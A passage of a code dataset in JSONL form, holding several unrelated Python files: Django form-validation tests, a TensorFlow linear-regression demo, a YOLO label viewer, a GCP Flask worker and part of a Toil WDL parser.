follow=True)\n self.assertContains(response, form.thank_you_text)\n\n\nclass TestFormFieldDefaultDateValidation(TestCase, MoloTestCaseMixin):\n def setUp(self):\n self.mk_main()\n self.login()\n\n def create_molo_form_field(self, field_type):\n form = MoloFormPage(\n title='Test Form',\n introduction='Introduction to Test Form ...',\n )\n FormsIndexPage.objects.first().add_child(instance=form)\n form.save_revision().publish()\n\n return MoloFormField.objects.create(\n page=form,\n label=\"When is your birthday\",\n field_type=field_type,\n admin_label=\"birthday\",\n )\n\n def create_personalisable_form_field(self, field_type):\n form = PersonalisableForm(\n title='Test Form',\n introduction='Introduction to Test Form ...',\n )\n\n FormsIndexPage.objects.first().add_child(instance=form)\n form.save_revision().publish()\n\n return PersonalisableFormField.objects.create(\n page=form,\n label=\"When is your birthday\",\n field_type=field_type,\n admin_label=\"birthday\",\n )\n\n def test_date_molo_form_fields_clean_if_blank(self):\n field = self.create_molo_form_field('date')\n field.default_value = \"\"\n try:\n field.clean()\n except ValidationError:\n self.fail(\"clean() raised ValidationError with valid content!\")\n\n def test_date_molo_form_fields_clean_with_valid_default(self):\n field = self.create_molo_form_field('date')\n field.default_value = \"2008-05-05\"\n try:\n field.clean()\n except ValidationError:\n self.fail(\"clean() raised ValidationError with valid content!\")\n\n def test_date_molo_form_fields_not_clean_with_invalid_default(self):\n field = 
self.create_molo_form_field('date')\n field.default_value = \"something that isn't a date\"\n with self.assertRaises(ValidationError) as e:\n field.clean()\n\n self.assertEqual(e.exception.messages, ['Must be a valid date'])\n\n def test_datetime_molo_form_fields_clean_if_blank(self):\n field = self.create_molo_form_field('datetime')\n field.default_value = \"\"\n try:\n field.clean()\n except ValidationError:\n self.fail(\"clean() raised ValidationError with valid content!\")\n\n def test_datetime_molo_form_fields_clean_with_valid_default(self):\n field = self.create_molo_form_field('datetime')\n field.default_value = \"2008-05-05\"\n try:\n field.clean()\n except ValidationError:\n self.fail(\"clean() raised ValidationError with valid content!\")\n\n def test_datetime_molo_form_fields_not_clean_with_invalid_default(self):\n field = self.create_molo_form_field('datetime')\n field.default_value = \"something that isn't a date\"\n with self.assertRaises(ValidationError) as e:\n field.clean()\n\n self.assertEqual(e.exception.messages, ['Must be a valid date'])\n\n def test_date_personalisabe_form_fields_clean_if_blank(self):\n field = self.create_personalisable_form_field('date')\n field.default_value = \"\"\n try:\n field.clean()\n except ValidationError:\n self.fail(\"clean() raised ValidationError with valid content!\")\n\n def test_date_personalisabe_form_fields_clean_with_valid_default(self):\n field = self.create_personalisable_form_field('date')\n field.default_value = \"2008-05-05\"\n try:\n field.clean()\n except ValidationError:\n self.fail(\"clean() raised ValidationError with valid content!\")\n\n def test_date_personalisable_fields_not_clean_with_invalid_default(self):\n field = self.create_personalisable_form_field('date')\n field.default_value = \"something that isn't a date\"\n with self.assertRaises(ValidationError) as e:\n field.clean()\n\n self.assertEqual(e.exception.messages, ['Must be a valid date'])\n\n def test_datetime_personalisabe_form_fields_clean_if_blank(self):\n field = self.create_personalisable_form_field('datetime')\n field.default_value = \"\"\n try:\n field.clean()\n except ValidationError:\n self.fail(\"clean() raised ValidationError with valid content!\")\n\n def test_datetime_personalisabe_form_fields_clean_with_valid_default(self):\n field = self.create_personalisable_form_field('datetime')\n field.default_value = \"2008-05-05\"\n try:\n field.clean()\n except ValidationError:\n self.fail(\"clean() raised ValidationError with valid content!\")\n\n def test_datetime_personalisable_fields_not_clean_with_invalid_default(\n self):\n field = self.create_personalisable_form_field('datetime')\n field.default_value = \"something that isn't a date\"\n with self.assertRaises(ValidationError) as e:\n field.clean()\n\n self.assertEqual(e.exception.messages, ['Must be a valid date'])\n","repo_name":"praekeltfoundation/molo.forms","sub_path":"molo/forms/tests/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":20883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72177005033","text":"for t in range(int(input())):\r\n n = int(input())\r\n size = []\r\n answer = 0\r\n for i in range(n):\r\n size.append(int(input()))\r\n for num in size:\r\n if num < sum(size)//n:\r\n answer += (sum(size)//n - num)\r\n print('#' + str(t+1), str(answer))","repo_name":"khw5123/Algorithm","sub_path":"SWExpert/5603. [Professional] 건초더미.py","file_name":"5603. 
[Professional] 건초더미.py","file_ext":"py","file_size_in_byte":279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"4175382251","text":"# !usr/bin/env python\n# coding:utf-8\n\n\"\"\"\nHello World Tensorflow\n 真的是方法千万种\nauthor: prucehuang \n email: 1756983926@qq.com\n date: 2019/08/04\n\"\"\"\n\nimport sys, os\nfor i in range(len(sys.path)):\n sys.path[i] = sys.path[i].split('\\. ')[0]\n\nimport tensorflow as tf\nimport numpy as np\nfrom sklearn import datasets\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.preprocessing import StandardScaler\n\ndef reset_graph(seed=42):\n tf.reset_default_graph()\n tf.set_random_seed(seed)\n np.random.seed(seed)\n\n# 方法一:用正规方程方法计算theta\ndef equation_tensorflow():\n X = tf.constant(iris_data_plus_bias, dtype=tf.float32, name=\"X\")\n y = tf.constant(iris.target.reshape(-1, 1), dtype=tf.float32, name=\"y\")\n XT = tf.transpose(X)\n theta = tf.matmul(tf.matmul(tf.matrix_inverse(tf.matmul(XT, X)), XT), y)\n with tf.Session() as sess:\n theta_value = theta.eval()\n print('tensorflow:\\n', theta_value)\n\n# 方法二:使用numpy的函数正规方程发求解theta\ndef equstion_numpy():\n X = iris_data_plus_bias\n y = iris.target.reshape(-1, 1)\n theta_numpy = np.linalg.inv(X.T.dot(X)).dot(X.T).dot(y)\n print('numpy:\\n', theta_numpy)\n\n# 方法三:使用sklearn的LR class求解\ndef linear_regression_sklearn():\n lin_reg = LinearRegression()\n lin_reg.fit(iris.data, iris.target.reshape(-1, 1))\n print('sklearn:\\n', np.r_[lin_reg.intercept_.reshape(-1, 1), lin_reg.coef_.T])\n\n# 方法四:使用TensorFlow手动梯度下降\ndef gradients_descent_manually_tensorflow():\n reset_graph()\n n_epochs = 1000\n learning_rate = 0.01\n\n X = tf.constant(scaled_iris_data_plus_bias, dtype=tf.float32, name=\"X\")\n y = tf.constant(iris.target.reshape(-1, 1), dtype=tf.float32, name=\"y\")\n theta = tf.Variable(tf.random_uniform([n + 1, 1], -1.0, 1.0, seed=42), name=\"theta\")\n y_pred = tf.matmul(X, theta, name=\"predictions\")\n error = y_pred - y\n mse = tf.reduce_mean(tf.square(error), name=\"mse\")\n gradients = 2 / m * tf.matmul(tf.transpose(X), error)\n training_op = tf.assign(theta, theta - learning_rate * gradients)\n\n init = tf.global_variables_initializer()\n with tf.Session() as sess:\n sess.run(init)\n for epoch in range(n_epochs):\n if epoch % 100 == 0:\n print(\"Epoch\", epoch, \"MSE =\", mse.eval())\n sess.run(training_op)\n\n best_theta = theta.eval()\n print('tensorflow manually gradients\\n', best_theta)\n\n# 方法五:使用TensorFlow autodiff梯度下降\ndef gradients_descent_autodiff_tensorflow():\n reset_graph()\n n_epochs = 1000\n learning_rate = 0.01\n\n X = tf.constant(scaled_iris_data_plus_bias, dtype=tf.float32, name=\"X\")\n y = tf.constant(iris.target.reshape(-1, 1), dtype=tf.float32, name=\"y\")\n theta = tf.Variable(tf.random_uniform([n + 1, 1], -1.0, 1.0, seed=42), name=\"theta\")\n y_pred = tf.matmul(X, theta, name=\"predictions\")\n error = y_pred - y\n mse = tf.reduce_mean(tf.square(error), name=\"mse\")\n gradients = tf.gradients(mse, [theta])[0]\n training_op = tf.assign(theta, theta - learning_rate * gradients)\n\n init = tf.global_variables_initializer()\n with tf.Session() as sess:\n sess.run(init)\n for epoch in range(n_epochs):\n if epoch % 100 == 0:\n print(\"Epoch\", epoch, \"MSE =\", mse.eval())\n sess.run(training_op)\n\n best_theta_1 = theta.eval()\n\n print('tensorflow audodiff gradients:\\n', best_theta_1)\n\n# 方法六:直接使用GradientDescentOptimizer\ndef gradients_descent_optinizer_tensorflow():\n reset_graph()\n n_epochs = 1000\n 
learning_rate = 0.01\n\n X = tf.constant(scaled_iris_data_plus_bias, dtype=tf.float32, name=\"X\")\n y = tf.constant(iris.target.reshape(-1, 1), dtype=tf.float32, name=\"y\")\n theta = tf.Variable(tf.random_uniform([n + 1, 1], -1.0, 1.0, seed=42), name=\"theta\")\n y_pred = tf.matmul(X, theta, name=\"predictions\")\n error = y_pred - y\n mse = tf.reduce_mean(tf.square(error), name=\"mse\")\n # optimizer\n optimizer = tf.train.GradientDescentOptimizer(learning_rate=learning_rate)\n training_op = optimizer.minimize(mse)\n # start execution\n init = tf.global_variables_initializer()\n\n with tf.Session() as sess:\n sess.run(init)\n for epoch in range(n_epochs):\n if epoch % 100 == 0:\n print(\"Epoch\", epoch, \"MSE =\", mse.eval())\n sess.run(training_op)\n best_theta = theta.eval()\n\n print(\"tensorflow gradient descent optimizer:\\n\", best_theta)\n\n# Method 7: use MomentumOptimizer\ndef gradients_descent_MomentumOptimizer_tensorflow():\n reset_graph()\n n_epochs = 1000\n learning_rate = 0.01\n\n X = tf.constant(scaled_iris_data_plus_bias, dtype=tf.float32, name=\"X\")\n y = tf.constant(iris.target.reshape(-1, 1), dtype=tf.float32, name=\"y\")\n theta = tf.Variable(tf.random_uniform([n + 1, 1], -1.0, 1.0, seed=42), name=\"theta\")\n y_pred = tf.matmul(X, theta, name=\"predictions\")\n error = y_pred - y\n mse = tf.reduce_mean(tf.square(error), name=\"mse\")\n # use MomentumOptimizer\n optimizer = tf.train.MomentumOptimizer(learning_rate=learning_rate, momentum=0.9)\n training_op = optimizer.minimize(mse)\n # start execution\n init = tf.global_variables_initializer()\n with tf.Session() as sess:\n sess.run(init)\n for epoch in range(n_epochs):\n sess.run(training_op)\n if epoch % 100 == 0:\n print(\"Epoch\", epoch, \"MSE =\", mse.eval())\n best_theta = theta.eval()\n\n print(\"tensorflow momentum optimizer:\\n\", best_theta)\n\n\ndef fetch_batch(epoch, batch_index, batch_size, n_batches):\n np.random.seed(epoch * n_batches + batch_index)\n indices = np.random.randint(m, size=batch_size)\n X_batch = scaled_iris_data_plus_bias[indices]\n y_batch = iris.target.reshape(-1, 1)[indices]\n return X_batch, y_batch\n\n# Method 8: mini-batch stochastic gradient descent, using placeholders\ndef batch_gradients_descent_optimizer_placeholder_tensorflow():\n reset_graph()\n learning_rate = 0.01\n iris = datasets.load_iris()\n m, n = iris.data.shape\n n_epochs = 10\n batch_size = 100\n n_batches = int(np.ceil(m / batch_size))\n scaler = StandardScaler()\n scaled_iris_data = scaler.fit_transform(iris.data)\n scaled_iris_data_plus_bias = np.c_[np.ones((m, 1)), scaled_iris_data]\n # a placeholder holds no data itself; actual values are fed in later via feed_dict\n X = tf.placeholder(tf.float32, shape=(None, n + 1), name=\"X\")\n y = tf.placeholder(tf.float32, shape=(None, 1), name=\"y\")\n theta = tf.Variable(tf.random_uniform([n + 1, 1], -1.0, 1.0, seed=42), name=\"theta\")\n y_pred = tf.matmul(X, theta, name=\"predictions\")\n error = y_pred - y\n mse = tf.reduce_mean(tf.square(error), name=\"mse\")\n optimizer = tf.train.GradientDescentOptimizer(learning_rate=learning_rate)\n training_op = optimizer.minimize(mse)\n\n init = tf.global_variables_initializer()\n\n with tf.Session() as sess:\n sess.run(init)\n for epoch in range(n_epochs):\n for batch_index in range(n_batches):\n X_batch, y_batch = fetch_batch(epoch, batch_index, batch_size, n_batches)\n # feed one random batch of data per step\n sess.run(training_op, feed_dict={X: X_batch, y: y_batch})\n best_theta_2 = theta.eval()\n\n print(\"tensorflow mini-batch Gradient Descent Optimizer:\\n\", best_theta_2)\n\nif __name__ == \"__main__\":\n print('Hello, Welcome to My 
World')\n reset_graph()\n\n iris = datasets.load_iris()\n m, n = iris.data.shape\n iris_data_plus_bias = np.c_[np.ones((m, 1)), iris.data]\n # feature scaling (standardization)\n scaler = StandardScaler()\n scaled_iris_data = scaler.fit_transform(iris.data)\n scaled_iris_data_plus_bias = np.c_[np.ones((m, 1)), scaled_iris_data]\n\n # equation_tensorflow()\n # equation_numpy()\n # linear_regression_sklearn()\n # gradients_descent_manually_tensorflow()\n # gradients_descent_autodiff_tensorflow()\n # gradients_descent_optimizer_tensorflow()\n # gradients_descent_MomentumOptimizer_tensorflow()\n batch_gradients_descent_optimizer_placeholder_tensorflow()","repo_name":"prucehuang/quickly-start-python","sub_path":"tensorflow/1.x/linear_regression.py","file_name":"linear_regression.py","file_ext":"py","file_size_in_byte":8173,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38394743125","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Sep 24 22:59:10 2020\r\n\r\nControl the images in a shot folder and their ground-truth YOLO boxes\r\n\r\n@author: Onur Caki\r\n\"\"\"\r\n#!python3\r\n\r\nimport os\r\nimport cv2\r\nimport argparse\r\nimport re\r\nimport numpy as np\r\nimage_ext = ['.bmp', '.png', '.jpg']\r\n\r\n\r\ndef color_generator():\r\n label_colors = []\r\n for i in range(80):\r\n c = (int(np.random.randint(60, 255, 3)[0]),\r\n int(np.random.randint(60, 255, 3)[1]),\r\n int(np.random.randint(60, 255, 3)[2]))\r\n label_colors.append(c)\r\n return label_colors\r\n\r\n\r\ndef parse_args():\r\n ap = argparse.ArgumentParser()\r\n ap.add_argument(\"data_path\",\r\n help=\"path of the folder in which shots are located\")\r\n args = ap.parse_args()\r\n return args\r\n\r\n\r\ndef natural_sort(l):\r\n def convert(text): return int(text) if text.isdigit() else text.lower()\r\n def alphanum_key(key): return [convert(c)\r\n for c in re.split('([0-9]+)', key)]\r\n return sorted(l, key=alphanum_key)\r\n\r\n\r\ndef get_image_list(path):\r\n image_names = []\r\n for maindir, subdir, file_name_list in os.walk(path):\r\n for filename in file_name_list:\r\n apath = os.path.join(maindir, filename)\r\n ext = os.path.splitext(apath)[1]\r\n if ext in image_ext:\r\n image_names.append(apath)\r\n return natural_sort(image_names)\r\n\r\n\r\ndef read_gt(label, experiment_image):\r\n with open(label) as f:\r\n labels = []\r\n Lines = f.readlines()\r\n for line in Lines:\r\n label = int(line.strip().split(' ')[0])\r\n # x_width\r\n xc = float(line.strip().split(' ')[1])\r\n # x_height\r\n yc = float(line.strip().split(' ')[2])\r\n w = float(line.strip().split(' ')[3])\r\n h = float(line.strip().split(' ')[4])\r\n # x_min = max(xc-w/2, 0)\r\n # y_min = max(yc-h/2, 0)\r\n # x_max = min(xc+w/2, 1)\r\n # y_max = min(yc+h/2, 1)\r\n\r\n xc_Real = xc * experiment_image.shape[1]\r\n yc_Real = yc * experiment_image.shape[0]\r\n w_Real = w * experiment_image.shape[1]\r\n h_Real = h * experiment_image.shape[0]\r\n\r\n # x_min = int(round(x_min * experiment_image.shape[1]))\r\n # x_max = int(round(x_max * experiment_image.shape[1]))\r\n\r\n # y_min = int(round(y_min * experiment_image.shape[0]))\r\n # y_max = int(round(y_max * experiment_image.shape[0]))\r\n\r\n # x_min = int(xc_Real-w_Real/2)\r\n # x_max = int(xc_Real+w_Real/2)\r\n # y_min = int(yc_Real-h_Real/2)\r\n # y_max = int(yc_Real+h_Real/2)\r\n\r\n x_min = int(round(xc_Real-w_Real/2))\r\n x_max = int(round(xc_Real+w_Real/2))\r\n y_min = int(round(yc_Real-h_Real/2))\r\n y_max = int(round(yc_Real+h_Real/2))\r\n\r\n labels.append([label, 
x_min, y_min, x_max, y_max])\r\n f.close()\r\n return labels\r\n\r\n\r\ndef read_class_names(path):\r\n path = os.path.join(path, 'classes.txt')\r\n classes = []\r\n if os.path.exists(path):\r\n with open(path) as f:\r\n lines = f.readlines()\r\n for line in lines:\r\n classes.append(line.strip())\r\n return classes\r\n\r\n\r\nargs = parse_args()\r\nimage_path = args.data_path\r\n#image_path = \"/Users/hamzagorgulu/Desktop/course_contents/COMP541_Deep_Learning/Project/images_crop\"\r\nimage_list = get_image_list(image_path)\r\nlabel_colors = color_generator()\r\nclasses = read_class_names(image_path)\r\n\r\ni = 0\r\ndelete_list = []\r\nnew_annotations = []\r\nwhile 1:\r\n image = image_list[i]\r\n img = cv2.imread(image)\r\n\r\n # label_file_pth = image.replace(\"images\", \"labels\")\r\n # label_path = label_file_pth.replace(\"png\", \"txt\")\r\n label_path = image[:image.rfind('.')]+'.txt'\r\n\r\n if not os.path.exists(label_path):\r\n img = cv2.putText(img, 'There is no label for this image', (15, 15),\r\n cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 255), 1, cv2.LINE_AA)\r\n else:\r\n label = read_gt(label_path, img)\r\n for l in label:\r\n # represents the top left corner of rectangle\r\n start_point = (l[1], l[2])\r\n # represents the bottom right corner of rectangle\r\n end_point = (l[3], l[4])\r\n # green color in BGR\r\n color = label_colors[l[0]]\r\n # Line thickness of -1 px\r\n thickness = 1\r\n radius = 1\r\n xc = int((start_point[0] + end_point[0])/2)\r\n yc = int((start_point[1] + end_point[1])/2)\r\n\r\n center_coordinates = (xc, yc)\r\n img = cv2.circle(img, center_coordinates, radius, color, thickness)\r\n\r\n img = cv2.rectangle(img, start_point, end_point, color, thickness)\r\n if len(classes) > 0:\r\n img = cv2.putText(img, classes[l[0]], (l[1]-5, l[2]-5),\r\n cv2.FONT_HERSHEY_SIMPLEX, 1, color, 1, cv2.LINE_AA)\r\n if img.shape[0] >= 850:\r\n if img.shape[0] > img.shape[1]:\r\n img = cv2.resize(img, (540, 720)) # Resize image\r\n else:\r\n img = cv2.resize(img, (720, 540))\r\n cv2.imshow('window', img)\r\n ch = cv2.waitKey(0)\r\n\r\n if chr(ch) == \"d\":\r\n i = i + 1\r\n if i > len(image_list) - 1:\r\n print(\"finish\")\r\n i = 0\r\n if chr(ch) == \"a\":\r\n i = i - 1\r\n if i < 0:\r\n i = len(image_list) - 1\r\n if chr(ch) == \"1\":\r\n delete_list.append(image)\r\n if chr(ch) == \"2\":\r\n new_annotations.append(image)\r\n if chr(ch) == \"p\":\r\n print(image)\r\n if chr(ch) == \"r\":\r\n i = np.random.randint(low=0, high=len(image_list), size=1)[0]\r\n if chr(ch) == \"q\":\r\n cv2.destroyAllWindows()\r\n break\r\n\r\nif len(delete_list) != 0:\r\n delete_txt = open('delete.txt', 'w')\r\n for ele in delete_list:\r\n delete_txt.write(ele + '\\n')\r\n delete_txt.close()\r\n\r\n\r\nif len(new_annotations) != 0:\r\n label_txt = open('label.txt', 'w')\r\n for ele in new_annotations:\r\n label_txt.write(ele + '\\n')\r\n label_txt.close()\r\n","repo_name":"hamzagorgulu/Small-Object-Detection-with-YOLO","sub_path":"control_yolo_dataset.py","file_name":"control_yolo_dataset.py","file_ext":"py","file_size_in_byte":6180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2297084370","text":"import os\nimport sys\nimport glob\nimport string\nimport pandas as pd\nimport multiprocessing \n\n#os.chdir(\"../src\")\n#extension = 'csv'\n\nif __name__==\"__main__\":\n print(\"hello!\")\n total_mean_name = \"total_mean_vax_levels.csv\"\n total_quantile_name = \"total_quantile_vax_levels.csv\"\n n = 1\n starting_config = 0\n for k in 
range(starting_config,n):\n string_val = str(k)\n title_name = \"run_*_\"+string_val+\"0.csv\"\n all_filenames = [i for i in glob.glob(title_name)]\n #combine all files in the list\n for j in range(0,len(all_filenames)):\n all_filenames[j] = os.path.basename(all_filenames[j])\n combined_csv = pd.concat([pd.read_csv(f) for f in all_filenames ])\n print(\"combined!!\")\n name = \"total_sim_vax_level_\"+str(k)+\"0.csv\"\n combined_csv.to_csv(name,index=False,encoding='utf-8-sig')\n \n","repo_name":"vakrao/stochastic_endemic_model","sub_path":"scripts/seq_csv.py","file_name":"seq_csv.py","file_ext":"py","file_size_in_byte":985,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13086413525","text":"import utils\nfrom flask import Flask, request \nfrom config import config\nfrom connector.gcp import GCPService\nfrom scheduler import SchedulerJob\n\n\napp = Flask(__name__)\ngcp_service = GCPService() \nscheduler = SchedulerJob()\n\n\n@app.route(\"/export_customers\", methods=['POST'])\ndef export():\n \"\"\"Runs a query against BigQuery and exports results to a GCS bucket.\"\"\"\n date = (None if request.form.get('date') == 'None' else\n utils.process_url_date(request.form.get('date')))\n query_job_body = utils.load_query_job_body(date,\n **config)\n job = gcp_service.bigquery.execute_job(config['general']['project_id'],\n query_job_body)\n\n gcp_service.bigquery.poll_job(job)\n\n extract_job_body = utils.load_extract_job_body(date, **config)\n gcp_service.bigquery.execute_job(config['general']['project_id'],\n extract_job_body)\n return \"finished\"\n\n\n@app.route(\"/dataproc_dimsum\", methods=['POST'])\ndef dataproc_dimsum():\n \"\"\"Prepares the whole environment to run the DIMSUM spark job in Dataproc. 
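(DIMSUM approximates all-pairs column similarities of a large matrix by sampling, so the job's output is a sparse similarity matrix over the input columns.) 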
After\n the processing is over (this method waits until job is complete) then\n schedules a new call to prepare Datastore with the resulting similarity\n matrix we obtain from the algorithm.\"\"\"\n extended_args = request.form.get('extended_args').split(',')\n setup = config['jobs']['run_dimsum']\n job = gcp_service.dataproc.build_cluster(**setup)\n gcp_service.storage.upload_from_filenames(\n **config['jobs']['run_dimsum']['pyspark_job'])\n job = gcp_service.dataproc.submit_pyspark_job(extended_args,\n **config['jobs']['run_dimsum'])\n result = gcp_service.dataproc.delete_cluster(**setup)\n scheduler.run({'url': '/prepare_datastore',\n 'target': config['jobs']['dataflow_export'][\n 'dataflow_service']})\n return \"finished\"\n\n\n@app.route(\"/prepare_datastore\", methods=['POST'])\ndef prepare_datastore():\n \"\"\"With DIMSUM job completed, we run a Dataflow job to get results from \n GCS and save them properly into Datastore so we have quick access to\n results to build final recommendations for our customers.\"\"\"\n result = gcp_service.dataflow.run_template(**config['jobs'][\n 'dataflow_export']) \n return \"finished\"\n","repo_name":"WillianFuks/example_dataproc_twitter","sub_path":"gae/worker.py","file_name":"worker.py","file_ext":"py","file_size_in_byte":2249,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"72"} +{"seq_id":"9554343907","text":"from __future__ import absolute_import\nfrom __future__ import print_function\nfrom __future__ import division\n\nimport fnmatch\nimport argparse\nimport json\nimport csv\nimport os\nimport collections\nfrom toil import subprocess\nimport logging\nimport textwrap\n\nimport toil.wdl.wdl_parser as wdl_parser\n\nwdllogger = logging.getLogger(__name__)\n\n\nclass ToilWDL:\n '''\n A program to run WDL input files using native Toil scripts.\n\n Requires a WDL file, and a JSON file. The WDL file contains ordered commands,\n and the JSON file contains input values for those commands. To run in Toil,\n these two files must be parsed, restructured into python dictionaries, and\n then compiled into a Toil formatted python script. This compiled Toil script\n is deleted after running unless the user specifies: \"--dont_delete_compiled\"\n as an option.\n\n The WDL parser was auto-generated from the Broad's current WDL grammar file:\n https://github.com/openwdl/wdl/blob/master/parsers/grammar.hgr\n using Scott Frazer's Hermes: https://github.com/scottfrazer/hermes\n Thank you Scott Frazer!\n\n Currently in alpha testing, and known to work with the Broad's GATK tutorial\n set for WDL on their main wdl site:\n software.broadinstitute.org/wdl/documentation/topic?name=wdl-tutorials\n\n And ENCODE's WDL workflow:\n github.com/ENCODE-DCC/pipeline-container/blob/master/local-workflows/encode_mapping_workflow.wdl\n\n Additional support to be broadened to include more features soon.\n '''\n\n def __init__(self, wdl_filename, secondary_filename, output_directory):\n\n # inputs\n self.wdl_file = wdl_filename\n self.secondary_file = secondary_filename\n self.output_directory = output_directory\n\n if not os.path.exists(self.output_directory):\n try:\n os.makedirs(self.output_directory)\n except:\n raise OSError(\n 'Could not create directory. 
Insufficient permissions or disk space most likely.')\n\n self.output_file = os.path.join(self.output_directory,\n 'toilwdl_compiled.py')\n\n # only json is required; tsv/csv are optional\n self.json_dict = {}\n self.tsv_dict = {}\n self.csv_dict = {}\n\n # holds task skeletons from WDL task objects\n self.tasks_dictionary = {}\n\n # holds workflow structure from WDL workflow objects\n self.workflows_dictionary = {}\n\n # unique iterator to add to cmd names\n self.command_number = 0\n\n # unique number for a job\n self.task_number = 0\n\n # a job's 'level' on the DAG\n self.task_priority = 0\n\n def find_asts(self, ast_root, name):\n '''\n Finds an AST node with the given name and the entire subtree under it.\n A function borrowed from scottfrazer. Thank you Scott Frazer!\n\n :param ast_root: The WDL AST. The whole thing generally, but really\n any portion that you wish to search.\n :param name: The name of the subtree you're looking for, like \"Task\".\n :return: nodes representing the AST subtrees matching the \"name\" given.\n '''\n nodes = []\n if isinstance(ast_root, wdl_parser.AstList):\n for node in ast_root:\n nodes.extend(self.find_asts(node, name))\n elif isinstance(ast_root, wdl_parser.Ast):\n if ast_root.name == name:\n nodes.append(ast_root)\n for attr_name, attr in ast_root.attributes.items():\n nodes.extend(self.find_asts(attr, name))\n return nodes\n\n def create_tsv_array(self, tsv_filepath):\n '''\n Take a tsv filepath and return an array; e.g. [[],[],[]].\n\n For example, a file containing:\n\n 1 2 3\n 4 5 6\n 7 8 9\n\n would return the array: [['1','2','3'], ['4','5','6'], ['7','8','9']]\n\n :param tsv_filepath:\n :return: tsv_array\n '''\n tsv_array = []\n with open(tsv_filepath, \"r\") as f:\n data_file = csv.reader(f, delimiter=\"\\t\")\n for line in data_file:\n tsv_array.append(line)\n return (tsv_array)\n\n def create_csv_array(self, csv_filepath):\n '''\n Take a csv filepath and return an array; e.g. [[],[],[]].\n\n For example, a file containing:\n\n 1,2,3\n 4,5,6\n 7,8,9\n\n would return the array: [['1','2','3'], ['4','5','6'], ['7','8','9']]\n\n :param csv_filepath:\n :return: csv_array\n '''\n csv_array = []\n with open(csv_filepath, \"r\") as f:\n data_file = csv.reader(f)\n for line in data_file:\n csv_array.append(line)\n return (csv_array)\n\n def dict_from_YML(self, YML_file):\n '''\n Not written yet. Use JSON. It's better anyway.\n\n :param YML_file: A yml file with extension '*.yml' or '*.yaml'.\n :return: Nothing.\n '''\n raise NotImplementedError('.y(a)ml support is currently underwhelming.')\n\n def dict_from_JSON(self, JSON_file):\n '''\n Takes a WDL-mapped json file and creates a dict containing the bindings.\n The 'return' value is only used for unittests.\n\n :param JSON_file: A required JSON file containing WDL variable bindings.\n :return: Returns the self.json_dict purely for unittests.\n '''\n\n # TODO: Add context support for variables within multiple wdl files\n with open(JSON_file) as data_file:\n data = json.load(data_file)\n for d in data:\n d_list = d.split('.')\n self.json_dict[d_list[-1]] = data[d]\n return self.json_dict\n\n def create_tasks_dict(self, ast):\n '''\n Parse each \"Task\" in the AST. This will create self.tasks_dictionary,\n where each task name is a key.\n\n :return: Creates the self.tasks_dictionary necessary for much of the\n parser. 
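Each task entry holds that task's 'inputs', 'raw_commandline', 'runtime', and 'outputs' sections. 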
Returning it is only necessary for unittests.\n '''\n tasks = self.find_asts(ast, 'Task')\n for task in tasks:\n self.parse_task(task)\n return self.tasks_dictionary\n\n def parse_task(self, task):\n '''\n Parses a WDL task AST subtree.\n\n Currently looks at and parses 4 sections:\n 1. Declarations (e.g. string x = 'helloworld')\n 2. Commandline (a bash command with dynamic variables inserted)\n 3. Runtime (docker image; disk; CPU; RAM; etc.)\n 4. Outputs (expected return values/files)\n\n :param task: An AST subtree of a WDL \"Task\".\n :return: Returns nothing but adds a task to the self.tasks_dictionary\n necessary for much of the parser.\n '''\n\n task_name = task.attributes[\"name\"].source_string\n\n # task declarations\n declaration_array = []\n for declaration_subAST in task.attr(\"declarations\"):\n var_name, var_type, var_value = self.parse_task_declaration(\n declaration_subAST)\n var_truple = (var_name, var_type, var_value)\n declaration_array.append(var_truple)\n self.tasks_dictionary.setdefault(task_name, {})[\n 'inputs'] = declaration_array\n\n for section in task.attr(\"sections\"):\n\n # task commandline entries section [command(s) to run]\n if section.name == \"RawCommand\":\n command_array = self.parse_task_rawcommand(section)\n self.tasks_dictionary.setdefault(task_name, {})[\n 'raw_commandline'] = command_array\n\n # task runtime section (docker image; disk; CPU; RAM; etc.)\n if section.name == \"Runtime\":\n runtime_array = self.parse_task_runtime(section)\n self.tasks_dictionary.setdefault(task_name, {})[\n 'runtime'] = runtime_array\n\n # task output filenames section (expected return values/files)\n if section.name == \"Outputs\":\n output_array = self.parse_task_outputs(section)\n self.tasks_dictionary.setdefault(task_name, {})[\n 'outputs'] = output_array\n\n def parse_task_declaration(self, declaration_subAST):\n '''\n Parses the declaration section of the WDL task AST subtree.\n\n So far tasks only contain stubs without value assignment, such as:\n\n String my_name\n String your_name\n Int two_chains_i_mean_names\n\n But in the future who knows. The var_value variable below is a stub to\n potentially allow for variable assignment in the future.\n\n :param declaration_subAST: Some subAST representing a task declaration\n like: 'String file_name'\n :return: var_name, var_type, var_value\n Example:\n Input subAST representing: 'String file_name'\n Output: var_name='file_name', var_type='String', var_value=None\n '''\n\n # variable name\n if declaration_subAST.attr(\"name\"):\n if isinstance(declaration_subAST.attr(\"name\"), wdl_parser.Terminal):\n var_name = declaration_subAST.attr(\"name\").source_string\n elif isinstance(declaration_subAST.attr(\"name\"), wdl_parser.Ast):\n raise NotImplementedError\n elif isinstance(declaration_subAST.attr(\"name\"),\n wdl_parser.AstList):\n raise NotImplementedError\n\n # variable type\n if declaration_subAST.attr(\"type\"):\n\n # if the variable type is a primitive\n if isinstance(declaration_subAST.attr(\"type\"), wdl_parser.Terminal):\n var_type = declaration_subAST.attr(\"type\").source_string\n\n # if the variable type is not a primitive (i.e. 
